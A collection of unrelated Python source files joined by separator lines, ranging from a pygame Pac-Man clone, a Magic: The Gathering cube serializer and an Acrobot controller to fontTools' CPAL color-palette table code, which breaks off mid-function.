screen.blit(ghost_image_1, ghost.rect)
if x == 2:
screen.blit(ghost_image_2, ghost.rect)
if x == 3:
screen.blit(ghost_image_3, ghost.rect)
if x == 4:
screen.blit(ghost_image_4, ghost.rect)
x += 1
labelScore = scoreText.render("Score: " + str(game.points), 1, (0, 0, 0))
screen.blit(labelScore, (0, -4))
if mouth_open:
if flipped:
screen.blit(patman_open_flipped, player.rect)
else:
screen.blit(patman_open, player.rect)
mouth_open = False
else:
if flipped:
screen.blit(patman_closed_flipped, player.rect)
else:
screen.blit(patman_closed, player.rect)
mouth_open = True
pygame.display.flip()
if len(points) == 0:
running = False
x += 1
ghostinc += 1
###########
# input() #
###########
if ghostinc % 2 == 0:
time.sleep(sleep)
pygame.mixer.Sound.play(waca)
time.sleep(sleep)
sleep = abs((pointlength - game.points / 2) / 5000)
pygame.display.flip()
while True:
Main()
|
n = int(input())
records = {}
for r in range(n):
student = input().split()
records[student[0]] = [float(i) for i in student[1:]]
name = input()
avg = sum(records[name])/3
print("{:.2f}".format(avg))
|
from json import load
from operator import itemgetter
from pathlib import Path
from pprint import pprint
from click import argument, group, pass_context
from click_pathlib import Path as ClickPath
from kirby_transform import Processor
@group()
@argument("-f", "--file_path", type=ClickPath(exists=True, file_okay=True, dir_okay=True),
help="Dir or file to test on")
@pass_context
def cli(ctx, path: Path) -> None:
def return_data(file: Path) -> dict:
with open(file) as fp:
return load(fp)
if path.is_dir():
files_to_test = [dict(filename=x.name,
data=return_data(x)) for x in (path.glob("*.json"))]
elif path.is_file():
files_to_test = [dict(filename=path.name,
data=return_data(path))]
else:
raise OSError(f" {Path} wasn't a file or dir") # shouldn't happen
ctx.files = files_to_test
@cli.command(name="ci_check",
help="Prints the standard processed output data, will return 1 for failure for use with CI")
@argument('-s', '--supress_output', default=False, type=bool, show_default=True,
help="Don't print the output if succesful, just return exit code 0")
@pass_context
def stdout(ctx, supress_output: bool) -> None:
"""Return 0 (success) or 1 (failure) for use with CI"""
for path_name, data in map(itemgetter('filename', 'data'), ctx.files):
try:
processed = Processor().process(data)
if not supress_output:
pprint(data)
if len(processed.data) == 0:
raise ValueError("No data returned")
except Exception as e:
(f"Failed on file {path_name} \n {data} \n")
raise
exit(0)
|
def prime_number_gen(n):
"""
The is_prime function has been defined in here to hide it from the outer scope
:param n:
:return [prime numbers between 0 and n]:
"""
def is_prime(num):
"""
returns True if num is prime else, False
:param num:
:return bool:
"""
for i in range(3, int(num ** 0.5) + 1, 2):
if num % i == 0:
return False
return True
primes_list = []
if type(n) != int:
return 'Only Numbers allowed'
elif n < 0:
return 'Only Positive Numbers allowed'
elif n <= 1:
return []
elif n >= 2:
primes_list.append(2)
for x in range(3, n+1, 2):
if is_prime(x):
primes_list.append(x)
return primes_list
def main():
print(prime_number_gen(1000000))
if __name__ == '__main__':main()
|
import typing as t
from abc import abstractmethod
from distutils.util import strtobool
from rest_framework.request import Request
from mtgorp.models.collections.deck import Deck
from mtgorp.models.persistent.card import Card
from mtgorp.models.persistent.cardboard import Cardboard
from mtgorp.models.persistent.expansion import Expansion
from mtgorp.models.persistent.printing import Printing
from mtgorp.models.serilization.serializeable import compacted_model
from mtgorp.models.serilization.strategies.jsonid import JsonId
from mtgorp.models.serilization.strategies.raw import RawStrategy
from magiccube.collections.cube import Cube
from magiccube.collections.cubeable import BaseCubeable, FlatBaseCubeable, Cubeable, CardboardCubeable
from magiccube.collections.fantasysets import FantasySet
from magiccube.collections.infinites import Infinites
from magiccube.collections.laps import TrapCollection
from magiccube.collections.meta import MetaCube
from magiccube.collections.nodecollection import NodeCollection, ConstrainedNode, GroupMap
from magiccube.laps.purples.purple import BasePurple, Purple, CardboardPurple
from magiccube.laps.tickets.ticket import BaseTicket, Ticket, CardboardTicket
from magiccube.laps.traps.trap import BaseTrap, Trap, CardboardTrap
from magiccube.laps.traps.tree.printingtree import BaseNode
from magiccube.update import cubeupdate
from magiccube.update.report import UpdateReport, ReportNotification
from api.values import Releasable
T = t.TypeVar('T')
DATETIME_FORMAT = '%Y %M/%d'
class ModelSerializer(t.Generic[T]):
@classmethod
@abstractmethod
def serialize(cls, serializeable: T) -> compacted_model:
pass
class PrintingIdSerializer(object):
@classmethod
def serialize(cls, printing: Printing) -> int:
return printing.id
class CardboardIdSerializer(object):
@classmethod
def serialize(cls, cardboard: Cardboard) -> str:
return cardboard.name
class ExpansionSerializer(ModelSerializer[Expansion]):
@classmethod
def serialize(cls, expansion: Expansion) -> compacted_model:
return {
'code': expansion.code,
'name': expansion.name,
'block': None if expansion.block is None else expansion.block.name,
'release_date': expansion.release_date.strftime(DATETIME_FORMAT),
'type': 'expansion',
'id': expansion.code,
}
class MinimalPrintingSerializer(ModelSerializer[Printing]):
@classmethod
def serialize(cls, printing: Printing) -> compacted_model:
return {
'name': printing.cardboard.name,
'id': printing.id,
}
class PrintingSerializer(ModelSerializer[Printing]):
@classmethod
def serialize(cls, printing: Printing) -> compacted_model:
return {
'id': printing.id,
'name': printing.cardboard.name,
'cmc': printing.cardboard.front_card.cmc,
'expansion_code': printing.expansion.code,
'color': [
color.letter_code
for color in
printing.cardboard.front_card.color
],
'types': [
_type.name
for _type in
printing.cardboard.front_card.type_line.types
],
'type': 'printing',
'cardboard_cubeable_id': printing.cardboard.id,
}
class CardSerializer(ModelSerializer[Card]):
@classmethod
def serialize(cls, card: Card) -> compacted_model:
return {
'name': card.name,
'id': card.name,
'oracle_text': card.oracle_text,
'mana_cost': (
None
if card.mana_cost is None else
{
'str': str(card.mana_cost),
'atoms': [
atom.code
for atom in
card.mana_cost
],
}
),
'cmc': card.cmc,
'color': [
color.letter_code
for color in
card.color
],
'type_line': {
'types': [
_type.name
for _type in
card.type_line.types
],
'line': str(card.type_line),
},
'power_toughness': (
None
if card.power_toughness is None else
{
'power': str(card.power_toughness.power),
'toughness': str(card.power_toughness.toughness),
'str': str(card.power_toughness)
}
),
'loyalty': str(card.loyalty),
}
class CardboardSerializer(ModelSerializer[Cardboard]):
@classmethod
def serialize(cls, cardboard: Cardboard) -> compacted_model:
return {
'name': cardboard.name,
'id': cardboard.name,
'front_cards': [
CardSerializer.serialize(card)
for card in
cardboard.front_cards
],
'back_cards': [
CardSerializer.serialize(card)
for card in
cardboard.back_cards
],
'layout': cardboard.layout.name,
'type': 'cardboard',
}
class MinimalCardboardSerializer(ModelSerializer[Cardboard]):
@classmethod
def serialize(cls, cardboard: Cardboard) -> compacted_model:
return {
'name': cardboard.name,
'id': cardboard.name,
}
class FullPrintingSerializer(ModelSerializer[Printing]):
@classmethod
def serialize(cls, printing: Printing) -> compacted_model:
return {
'id': printing.id,
'name': printing.cardboard.name,
'expansion': ExpansionSerializer.serialize(printing.expansion),
'cardboard': CardboardSerializer.serialize(printing.cardboard),
'type': printing.__class__.__name__,
'cardboard_cubeable_id': printing.cardboard.id,
}
class NodeSerializer(ModelSerializer[BaseNode]):
@classmethod
def _serialize_child(cls, child: BaseCubeable) -> compacted_model:
if isinstance(child, Printing):
return PrintingSerializer.serialize(child)
if isinstance(child, Cardboard):
return CardboardSerializer.serialize(child)
return cls.serialize(child)
@classmethod
def serialize(cls, printing_node: BaseNode) -> compacted_model:
return {
'type': printing_node.__class__.__name__,
'children': [
(
cls._serialize_child(child),
multiplicity,
)
for child, multiplicity in
printing_node.children.items()
],
'id': printing_node.persistent_hash(),
}
class TrapSerializer(ModelSerializer[BaseTrap]):
@classmethod
def serialize(cls, trap: BaseTrap) -> compacted_model:
d = {
'id': trap.persistent_hash(),
'node': NodeSerializer.serialize(trap.node),
'intention_type': trap.intention_type.name,
'type': 'trap',
'string_representation': trap.node.get_minimal_string(identified_by_id = False),
}
if isinstance(trap, Trap):
d['cardboard_cubeable_id'] = trap.as_cardboards.id
return d
class TicketSerializer(ModelSerializer[BaseTicket]):
@classmethod
def _serialize_option(cls, option: FlatBaseCubeable) -> t.Any:
if isinstance(option, Printing):
return PrintingSerializer.serialize(option)
return CardboardSerializer.serialize(option)
@classmethod
def serialize(cls, ticket: BaseTicket) -> compacted_model:
d = {
'options': list(map(cls._serialize_option, ticket.options)),
'name': ticket.name,
'id': ticket.persistent_hash(),
'type': 'ticket',
}
if isinstance(ticket, Ticket):
d['cardboard_cubeable_id'] = ticket.as_cardboards.id
return d
class PurpleSerializer(ModelSerializer[BasePurple]):
@classmethod
def serialize(cls, purple: BasePurple) -> compacted_model:
return {
'name': purple.name,
'id': purple.persistent_hash(),
'description': purple.description,
'type': 'purple',
'cardboard_cubeable_id': purple.name,
}
class CubeSerializer(ModelSerializer[Cube]):
@classmethod
def serialize(cls, cube: Cube) -> compacted_model:
return {
'printings': [
(
PrintingSerializer.serialize(printing),
multiplicity,
)
for printing, multiplicity in
cube.printings.items()
],
'traps': [
(
TrapSerializer.serialize(trap),
multiplicity,
)
for trap, multiplicity in
cube.traps.items()
],
'tickets': [
(
TicketSerializer.serialize(ticket),
multiplicity,
)
for ticket, multiplicity in
cube.tickets.items()
],
'purples': [
(
PurpleSerializer.serialize(purple),
multiplicity,
)
for purple, multiplicity in
cube.purples.items()
],
'type': 'cube',
}
class FantasySetSerializer(ModelSerializer[FantasySet]):
@classmethod
def serialize(cls, serializeable: FantasySet) -> compacted_model:
return {
'rarities': {
rarity: CubeSerializer.serialize(cube)
for rarity, cube in
serializeable.rarity_map.items()
},
'type': 'fantasy_set',
}
class ConstrainedNodeOrpSerializer(ModelSerializer[ConstrainedNode]):
@classmethod
def serialize(cls, constrained_node: ConstrainedNode) -> compacted_model:
return {
'id': constrained_node.persistent_hash(),
'value': constrained_node.value,
'groups': list(constrained_node.groups),
'node': NodeSerializer.serialize(
constrained_node.node
)
}
class ConstrainedNodesOrpSerializer(ModelSerializer[NodeCollection]):
@classmethod
def serialize(cls, constrained_nodes: NodeCollection) -> compacted_model:
return {
'nodes': [
(
ConstrainedNodeOrpSerializer.serialize(
node
),
multiplicity,
)
for node, multiplicity in
constrained_nodes.items()
]
}
class CubePatchOrpSerializer(ModelSerializer[cubeupdate.CubePatch]):
@classmethod
def serialize(cls, cube_patch: cubeupdate.CubePatch) -> compacted_model:
return {
'cube_delta': {
'printings': [
(PrintingSerializer.serialize(printing), multiplicity)
for printing, multiplicity in
cube_patch.cube_delta_operation.printings
],
'traps': [
(TrapSerializer.serialize(trap), multiplicity)
for trap, multiplicity in
cube_patch.cube_delta_operation.traps
],
'tickets': [
(TicketSerializer.serialize(ticket), multiplicity)
for ticket, multiplicity in
cube_patch.cube_delta_operation.tickets
],
'purples': [
(PurpleSerializer.serialize(purple), multiplicity)
for purple, multiplicity in
cube_patch.cube_delta_operation.purples
],
},
'node_delta': [
(
ConstrainedNodeOrpSerializer.serialize(node),
multiplicity,
)
for node, multiplicity in
cube_patch.node_delta_operation.nodes.items()
]
}
class CubeChangeSerializer(ModelSerializer[cubeupdate.CubeChange]):
@classmethod
def serialize(cls, serializeable: cubeupdate.CubeChange) -> compacted_model:
return {
'type': serializeable.__class__.__name__,
'id': serializeable.persistent_hash(),
'explanation': serializeable.explain(),
'content': JsonId.serialize(serializeable),
'category': serializeable.category.value,
}
class GroupMapSerializer(ModelSerializer[GroupMap]):
@classmethod
def serialize(cls, serializeable: GroupMap) -> compacted_model:
return {
'groups': dict(serializeable.groups),
}
class VerbosePatchSerializer(ModelSerializer[cubeupdate.VerboseCubePatch]):
@classmethod
def serialize(cls, serializeable: cubeupdate.VerboseCubePatch) -> compacted_model:
return {
'changes': [
[CubeChangeSerializer.serialize(change), multiplicity]
for change, multiplicity in
serializeable.changes.items()
]
}
class UpdateNotificationSerializer(ModelSerializer[ReportNotification]):
@classmethod
def serialize(cls, serializeable: ReportNotification) -> compacted_model:
return {
'title': serializeable.title,
'content': serializeable.content,
'level': serializeable.notification_level.value,
}
class UpdateReportSerializer(ModelSerializer[UpdateReport]):
@classmethod
def serialize(cls, serializeable: UpdateReport) -> compacted_model:
return {
'notifications': [
UpdateNotificationSerializer.serialize(
notification
)
for notification in
serializeable.notifications
]
}
class TrapCollectionSerializer(ModelSerializer[TrapCollection]):
@classmethod
def serialize(cls, serializeable: TrapCollection) -> compacted_model:
return {
'traps': [
(
TrapSerializer.serialize(trap),
multiplicity,
)
for trap, multiplicity in
serializeable.traps.items()
]
}
class DeckSerializer(ModelSerializer[Deck]):
@classmethod
def serialize(cls, serializeable: Deck) -> compacted_model:
return {
'maindeck': [
(
PrintingSerializer.serialize(printing),
multiplicity,
)
for printing, multiplicity in
serializeable.maindeck.items()
],
'sideboard': [
(
PrintingSerializer.serialize(printing),
multiplicity,
)
for printing, multiplicity in
serializeable.sideboard.items()
],
}
class InfinitesSerializer(ModelSerializer[Infinites]):
@classmethod
def serialize(cls, serializeable: Infinites) -> compacted_model:
return {
'cardboards': [
CardboardSerializer.serialize(cardboard)
for cardboard in
serializeable
]
}
class MetaCubeSerializer(ModelSerializer[MetaCube]):
@classmethod
def serialize(cls, serializeable: MetaCube) -> compacted_model:
return {
'cube': CubeSerializer.serialize(serializeable.cube),
'nodes': ConstrainedNodesOrpSerializer.serialize(serializeable.node_collection),
'group_map': GroupMapSerializer.serialize(serializeable.group_map),
'infinites': InfinitesSerializer.serialize(serializeable.infinites),
}
class MappedSerializer(ModelSerializer[T]):
_serializer_map: t.Mapping[str, t.Type[ModelSerializer]]
@classmethod
def serialize(cls, serializeable: T, request: t.Optional[Request] = None) -> compacted_model:
if request is not None and strtobool(request.query_params.get('native', '0')):
return (
serializeable.id
if isinstance(serializeable, Printing) or isinstance(serializeable, Cardboard)
else RawStrategy.serialize(serializeable)
)
return cls._serializer_map[serializeable.__class__.__name__].serialize(serializeable)
class CubeableSerializer(MappedSerializer[Cubeable]):
_serializer_map: t.Mapping[str, t.Type[ModelSerializer]] = {
Printing.__name__: PrintingSerializer,
Trap.__name__: TrapSerializer,
Ticket.__name__: TicketSerializer,
Purple.__name__: PurpleSerializer,
}
class CardboardCubeableSerializer(MappedSerializer[CardboardCubeable]):
_serializer_map: t.Mapping[str, t.Type[ModelSerializer]] = {
Cardboard.__name__: CardboardSerializer,
CardboardTrap.__name__: TrapSerializer,
CardboardTicket.__name__: TicketSerializer,
CardboardPurple.__name__: PurpleSerializer,
}
class ReleasableSerializer(MappedSerializer[Releasable]):
_serializer_map = {
Cube.__name__: CubeSerializer,
FantasySet.__name__: FantasySetSerializer,
}
|
from flask.ext.sqlalchemy import SQLAlchemy
db = SQLAlchemy()
user_group = db.Table('user_group',
db.Column('userid', db.String(30), db.ForeignKey('user.userid')),
db.Column('group_name', db.String(30), db.ForeignKey('group.name'))
)
class User(db.Model):
userid = db.Column(db.String(30), primary_key=True)
first_name = db.Column(db.String(30))
last_name = db.Column(db.String(30))
groups = db.relationship('Group', secondary=user_group,
backref=db.backref('users', lazy='dynamic'))
def __init__(self, userid, first_name, last_name):
self.userid = userid
self.first_name = first_name
self.last_name = last_name
class Group(db.Model):
name = db.Column(db.String(30), primary_key=True)
def __init__(self, name):
self.name = name
|
from cnn_model import PneumoniaPrediction
import argparse
import logging
if __name__ == "__main__":
# Parsing arguments...
logging.info('Starting model...')
clf = PneumoniaPrediction()
parser = argparse.ArgumentParser()
parser.add_argument('--img_path', type=str)
parser.add_argument('--model_path', type=str)
predict_img = parser.parse_args().img_path
model_path = parser.parse_args().model_path
# Preparing image to predict
clf = PneumoniaPrediction()
clf.load_model(model_path) # load trained model
img = clf.load_img(predict_img) # load image
prediction = clf.predict(img) # predict. returns probability
log_info = 'Probability of Pneumonia: ' + str(round(prediction, 2))
logging.info(log_info) # testing the prediction...
|
# -*- coding: utf-8 -*-
'''
@author: 程哲
@contact: 909991719@qq.com
@file: 虚约束控制.py
@time: 2017/11/18 14:46
'''
import gym
import matplotlib.pyplot as plt
import numpy as np
import pickle
from numpy import pi,sin,cos
from math import atan
from collections import deque
#虚约束控制函数
class CONTROL:
#系统参数
LINK_LENGTH_1 = 0.593
LINK_LENGTH_2 = 0.593
LINK_MASS_1 = 2.78
LINK_MASS_2 = 1.73
LINK_COM_POS_1 = 0.3
LINK_MOI1 = 0.25
LINK_COM_POS_2 = 0.4
LINK_MOI2 = 0.116
MU11 = 0.205
MU12 = 0.184
MU21 = 0.93
MU22 = 1.07
g = 9.81
omega1 = LINK_MASS_1 * LINK_COM_POS_1 ** 2 + LINK_MASS_2 * LINK_LENGTH_1 ** 2 + LINK_MOI1
omega2 = LINK_MASS_2 * LINK_COM_POS_2 ** 2 + LINK_MOI2
omega3 = LINK_MASS_2 * LINK_LENGTH_1 * LINK_COM_POS_2
omega4 = LINK_MASS_1 * LINK_COM_POS_1 + LINK_MASS_2 * LINK_LENGTH_1
omega5 = LINK_MASS_2 * LINK_COM_POS_2
#目标点
theta1d = -pi / 4
theta2d = pi / 2
#虚约束参数
a = (theta1d + pi / 2) / theta2d
b = -pi / 2
def __init__(self):
self.name="control"
def F(self,x):
F=(self.A*self.omega4+0.5*self.B*self.omega5)/self.a*sin(self.a*x+self.b)+(self.A*self.omega5+0.5*self.B*self.omega4)/(self.a+1)*sin((self.a+1)*x+self.b)\
+0.5*self.B*self.omega4/(self.a-1)*sin((self.a-1)*x+self.b)+0.5*self.B*self.omega5/(self.a+2)*sin((self.a+2)*x+self.b)
return F
def U(self,s):
self.s=s
self.A = self.omega2 + self.a * self.omega1 + self.a * self.omega2
self.B = (1 + 2 * self.a) * self.omega3
self.Y0 =0
Y = -(2 * self.g * (self.F(self.s[1]) - self.F(self.theta2d))) / (self.A + self.B * cos(self.s[1])) ** 2 + \
self.Y0 * ((self.A + self.B * cos(self.theta2d)) / (self.A + self.B * cos(self.s[1]))) ** 2
U=self.s[3]**2-Y
return U
def Torque(self,state):
theta1=state[0]
theta2=state[1]
dtheta1=state[2]
dtheta2=state[3]
############################################
#控制器系数
k1=20
k2=80
k3=55
#############################################
sgn = lambda x: 1 if x > 0 else -1 if x < 0 else 0
d11 = self.omega1 + self.omega2 + 2 * self.omega3 * cos(theta2)
d12 = self.omega2 + self.omega3 * cos(theta2)
d21 = d12
d22 = self.omega2
h1 = -self.omega3 * dtheta2 * sin(theta2) * (2 * dtheta1 + dtheta2) +self.MU11 * dtheta1 + self.MU12 * sgn(dtheta1)
h2 = self.omega3 * dtheta1 ** 2 * sin(theta2) + self.MU21 * dtheta2 + self.MU22 * sgn(dtheta2)
phi2 = self.omega5 * self.g * cos(theta1 + theta2)
phi1 = self.omega4 * self.g * cos(theta1) + phi2
U=self.U(state)
h=theta1-self.b-self.a*theta2
dh=dtheta1-self.a*dtheta2
B1=d11+d12
B2=-self.omega3*sin(theta2)*(2*self.a+1)
B3=self.omega4*self.g*cos(self.a*theta2+self.b)+self.omega5*self.g*cos(self.a*theta2+self.b+theta2)
fh=B3-self.omega4*self.g*cos(h+self.a+self.b)+self.omega5*self.g*cos(h+self.a*theta2+self.b+theta2)
fdh=2*self.omega3*dtheta2*sin(theta2)*dh
v=(k3*atan(U*dtheta2/B1)-B2*U+fh+fdh)/d11#虚约束项
f1=-(d22*(h1+phi1)-d12*(h2+phi2))/(d11*d22-d12*d21)
g1=-d12/(d11*d22-d12*d21)
f2=(d21*(h1+phi1)-d11*(h2+phi2))/(d11*d22-d12*d21)
g2=d11/(d11*d22-d12*d21)
ddh=v-k1*dh-k2*h
T=(ddh-f1+self.a*f2)/(g1-self.a*g2)
return T
if __name__ == '__main__':
env=gym.make('Acrobot-v1')
control=CONTROL()
#采集数据
buffer = deque()
normal = [1, 1, 1, 1, 4 * np.pi, 9 * np.pi]
#绘图变量
Theta1=[]
Theta2=[]
Theta1d=[]
Theta2d=[]
Theta1_velocity=[]
Theta2_velocity=[]
Action=[]
Action_smoothing=[]
Tau_theta1=[]
for _ in range(10):
state = env.reset()
print(_)
for step in range(1000):
# env.render()
if step==0:
action=[0]
else:
action=[np.clip(control.Torque(inf[0]),-10,10)]
next_state, r, done, inf = env.step(action)
action=np.array(action)/10
buffer.append((state / normal, action, r, next_state / normal, done))
# Theta1.append(inf[0][0])
# Theta2.append(inf[0][1])
# Theta1_velocity.append(inf[0][2])
# Theta2_velocity.append(inf[0][3])
# Action.append(action)
if done:
break
state = next_state
# plt.figure(1)
# plt.plot(Theta1,'r-',label='Theta1')
# plt.plot(Theta1d,'g--',label='Theta1d')
# plt.plot(Theta2, 'b-', label='Theta2')
# plt.plot(Theta2d,'y--',label='Theta2d')
# plt.legend()
# plt.figure(2)
# plt.plot(Action,'r-',label='Action')
# plt.show()
pickle.dump(buffer, open('data\object_demo.pickle', 'wb'))
# Tau_theta1.append(a_smoothing[0]*inf[0][2])
# Theta1.append(inf[0][0])
# Theta2.append(inf[0][1])
# Theta1_velocity.append(inf[0][2])
# Theta2_velocity.append(inf[0][3])
# Theta1d.append(-pi/4)
# Theta2d.append(pi/2)
# Action.append(a)
# Action_smoothing.append(a_smoothing)
###################################
# plt.figure(1)
# plt.plot(Theta1,'r-',label='Theta1')
# plt.plot(Theta1d,'g--',label='Theta1d')
# plt.plot(Theta2, 'b-', label='Theta2')
# plt.plot(Theta2d,'y--',label='Theta2d')
# plt.legend()
# plt.figure(2)
# plt.plot(Action,'r-',label='Action')
# plt.plot(Action_smoothing,'b-',label='Action_smoothing')
# plt.legend()
# plt.figure(3)
# plt.plot(Theta1_velocity,'r-',label='Theta1_volocity')
# plt.plot(Theta2_velocity, 'b-', label='Theta2_volocity')
# plt.legend()
# plt.figure(4)
# plt.plot(Tau_theta1,label='Tau*Theta1')
# plt.legend()
# plt.grid()
# plt.show()
# #################################
|
import os
def readAllFiles(path):
d = os.listdir(path)
files = []
for f in d:
files.append(path + f)
return files
def readFile(file):
f = open(file, "r", encoding='utf-8')
content = f.read().split('\n')
return content[0], content[1]
def readDataFile(name):
f = open("input-files/" + name, "r")
content = f.read().split('\n')
return content[0], content[1]
|
import re, sys
regex_pattern = "([,;:.!?\"]|\w+)"
for line in sys.stdin:
for token in re.findall(regex_pattern,line.strip()):
print(token)
|
# Copyright 2013 Google, Inc. All Rights Reserved.
#
# Google Author(s): Behdad Esfahbod
from fontTools.misc.textTools import bytesjoin, safeEval
from . import DefaultTable
import array
from collections import namedtuple
import struct
import sys
class table_C_P_A_L_(DefaultTable.DefaultTable):
NO_NAME_ID = 0xFFFF
DEFAULT_PALETTE_TYPE = 0
def __init__(self, tag=None):
DefaultTable.DefaultTable.__init__(self, tag)
self.palettes = []
self.paletteTypes = []
self.paletteLabels = []
self.paletteEntryLabels = []
def decompile(self, data, ttFont):
(
self.version,
self.numPaletteEntries,
numPalettes,
numColorRecords,
goffsetFirstColorRecord,
) = struct.unpack(">HHHHL", data[:12])
assert (
self.version <= 1
), "Version of CPAL table is higher than I know how to handle"
self.palettes = []
pos = 12
for i in range(numPalettes):
startIndex = struct.unpack(">H", data[pos : pos + 2])[0]
assert startIndex + self.numPaletteEntries <= numColorRecords
pos += 2
palette = []
ppos = goffsetFirstColorRecord + startIndex * 4
for j in range(self.numPaletteEntries):
palette.append(Color(*struct.unpack(">BBBB", data[ppos : ppos + 4])))
ppos += 4
self.palettes.append(palette)
if self.version == 0:
offsetToPaletteTypeArray = 0
offsetToPaletteLabelArray = 0
offsetToPaletteEntryLabelArray = 0
else:
pos = 12 + numPalettes * 2
(
offsetToPaletteTypeArray,
offsetToPaletteLabelArray,
offsetToPaletteEntryLabelArray,
) = struct.unpack(">LLL", data[pos : pos + 12])
self.paletteTypes = self._decompileUInt32Array(
data,
offsetToPaletteTypeArray,
numPalettes,
default=self.DEFAULT_PALETTE_TYPE,
)
self.paletteLabels = self._decompileUInt16Array(
data, offsetToPaletteLabelArray, numPalettes, default=self.NO_NAME_ID
)
self.paletteEntryLabels = self._decompileUInt16Array(
data,
offsetToPaletteEntryLabelArray,
self.numPaletteEntries,
default=self.NO_NAME_ID,
)
def _decompileUInt16Array(self, data, offset, numElements, default=0):
if offset == 0:
return [default] * numElements
result = array.array("H", data[offset : offset + 2 * numElements])
if sys.byteorder != "big":
result.byteswap()
assert len(result) == numElements, result
return result.tolist()
def _decompileUInt32Array(self, data, offset, numElements, default=0):
if offset == 0:
return [default] * numElements
result = array.array("I", data[offset : offset + 4 * numElements])
if sys.byteorder != "big":
result.byteswap()
assert len(result) == numElements, result
return result.tolist()
def compile(self, ttFont):
colorRecordIndices, colorRecords = self._compileColorRecords()
paletteTypes = self._compilePaletteTypes()
paletteLabels = self._compilePaletteLabels()
paletteEntryLabels = self._compilePaletteEntryLabels()
numColorRecords = len(colorRecords) // 4
offsetToFirstColorRecord = 12 + len(colorRecordIndices)
if self.version >= 1:
offsetToFirstColorRecord += 12
header = struct.pack(
">HHHHL",
self.version,
self.numPaletteEntries,
len(self.palettes),
numColorRecords,
offsetToFirstColorRecord,
)
if self.version == 0:
dataList = [header, colorRecordIndices, colorRecords]
else:
pos = offsetToFirstColorRecord + len(colorRecords)
if len(paletteTypes) == 0:
offsetToPaletteTypeArray = 0
else:
offsetToPaletteTypeArray = pos
pos += len(paletteTypes)
if len(paletteLabels) == 0:
offsetToPaletteLabelArray = 0
else:
offsetToPaletteLabelArray = pos
pos += len(paletteLabels)
if len(paletteEntryLabels) == 0:
offsetToPaletteEntryLabelArray = 0
else:
offsetToPaletteEntryLabelArray = pos
pos += len(paletteLabels)
header1 = struct.pack(
">LLL",
offsetToPaletteTypeArray,
offsetToPaletteLabelArray,
offsetToPaletteEntryLabelArray,
)
dataList = [
header,
colorRecordIndices,
header1,
colorRecords,
paletteTypes,
paletteLabels,
paletteEntryLabels,
]
return bytesjoin(dataList)
def _compilePalette(self, palette):
assert len(palette) == self.numPaletteEntries
pack = lambda c: struct.pack(">BBBB", c.blue, c.green, c.red, c.alpha)
return bytesjoin([pack(color) for color in palette])
def _compileColorRecords(self):
colorRecords, colorRecordIndices, pool = [], [], {}
for palette in self.palettes:
packedPalette = self._compilePalette(palette)
if packedPalette in pool:
index = pool[packedPalette]
else:
index = len(colorRecords)
colorRecords.append(packedPalette)
pool[packedPalette] = index
colorRecordIndices.append(struct.pack(">H", index * self.numPaletteEntries))
return bytesjoin(colorRecordIndices), bytesjoin(colorRecords)
def _compilePaletteTypes(self):
if self.version == 0 or not any(self.paletteTypes):
return b""
assert len(self.paletteTypes) == len(self.palettes)
result = bytesjoin([struct.pack(">I", ptype) for ptype in self.paletteTypes])
assert len(result) == 4 * len(self.palettes)
return result
def _compilePaletteLabels(self):
if self.version == 0 or all(l == self.NO_NAME_ID for l in self.paletteLabels):
return b""
assert len(self.paletteLabels) == len(self.palettes)
result = bytesjoin([struct.pack(">H", label) for label in self.paletteLabels])
assert len(result) == 2 * len(self.palettes)
return result
def _compilePaletteEntryLabels(self):
if self.version == 0 or all(
l == self.NO_NAME_ID for l in self.paletteEntryLabels
):
return b""
assert len(self.paletteEntryLabels) == self.numPaletteEntries
result = bytesjoin(
[struct.pack(">H", label) for label in self.paletteEntryLabels]
)
assert len(result) == 2 * self.numPaletteEntries
return result
def toXML(self, writer, ttFont):
numPalettes = len(self.palettes)
paletteLabels = {i: nameID for (i, nameID) in enumerate(self.paletteLabels)}
paletteTypes = {i: typ for (i, typ) in enumerate(self.paletteTypes)}
writer.simpletag("version", value=self.version)
writer.newline()
writer.simpletag("numPaletteEntries", value=self.numPaletteEntries)
writer.newline()
for index, palette in enumerate(self.palettes):
attrs = {"index": index}
paletteType = paletteTypes.get(index, self.DEFAULT_PALETTE_TYPE)
paletteLabel = paletteLabels.get(index, self.NO_NAME_ID)
if self.version > 0 and paletteLabel != self.NO_NAME_ID:
attrs["label"] = paletteLabel
if self.version > 0 and paletteType != self.DEFAULT_PALETTE_TYPE:
attrs["type"] = paletteType
writer.begintag("palette", **attrs)
writer.newline()
if (
self.version > 0
and paletteLabel != self.NO_NAME_ID
and ttFont
and "name" in ttFont
):
name = ttFont["name"].getDebugName(paletteLabel)
if name is not None:
writer.comment(name)
writer.newline()
assert len(palette) == self.numPaletteEntries
for cindex, color in enumerate(palette):
color.toXML(writer, ttFont, cindex)
writer.endtag("palette")
writer.newline()
if self.version > 0 and not all(
l == self.NO_NAME_ID for l in self.paletteEntryLabels
):
writer.begintag("paletteEntryLabels")
writer.newline()
for index, label in enumerate(self.paletteEntryLabels):
if label != self.NO_NAME_ID:
writer.simpletag("label", index=index, value=label)
if self.version > 0 and label and ttFont and "name" in ttFont:
name = ttFont["name"].getDebugName(label)
if name is not None:
writer.comment(name)
writer.newline()
writer.endtag("paletteEntryLabels")
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
if name == "palette":
self.paletteLabels.append(int(attrs.get("label", self.NO_NAME_ID)))
self.paletteTypes.append(int(attrs.get("type", self.DEFAULT_PALETTE_TYPE)))
palette = []
for element in content:
if isinstance(element, str):
continue
attrs = element[1]
color = Color.fromHex(attrs["value"])
palette.append(color)
self.palettes.append(palette)
elif name == "paletteEntryLabels":
colorLabels = {}
for element in content:
if isinstance(element, str):
continue
elementName, elementAttr, _ = element
if elementName == "label":
labelIndex = safeEval(elementAttr["index"])
nameID = safeEval(elementAttr["value"])
colorLabels[labelIndex] = nameID
self.paletteEntryLabels = [
colorLabels.get(i, self.NO_NAME_ID)
for i in range(self.numPaletteEntries)
]
elif "value" in attrs:
value = safeEval(attrs["value"])
setattr(self, name, value)
if name == "numPaletteEntries":
self.paletteEntryLabels = [self.NO_NAME_ID] * self.numPaletteEntries
class Color(namedtuple("Color", "blue green red alpha")):
def hex(self):
return "#%02X%02X%02X%02X" % (self.red, self.green, self.blue, self.alpha)
def __repr__(self):
return self.hex()
def toXML(self, writer, ttFont, index=None):
writer.simpletag("color", value=self.hex(), index=index)
writer.newline()
@classmethod
def fromHex(cls, value):
if value[0] == "#":
value = value[1:]
red = int(value[0:2], 16)
green = int(value[2:4], 16)
blue = int(value[4:6], 16)
alpha = int(value[6:8], 16) if len(value) >= 8 else 0xFF
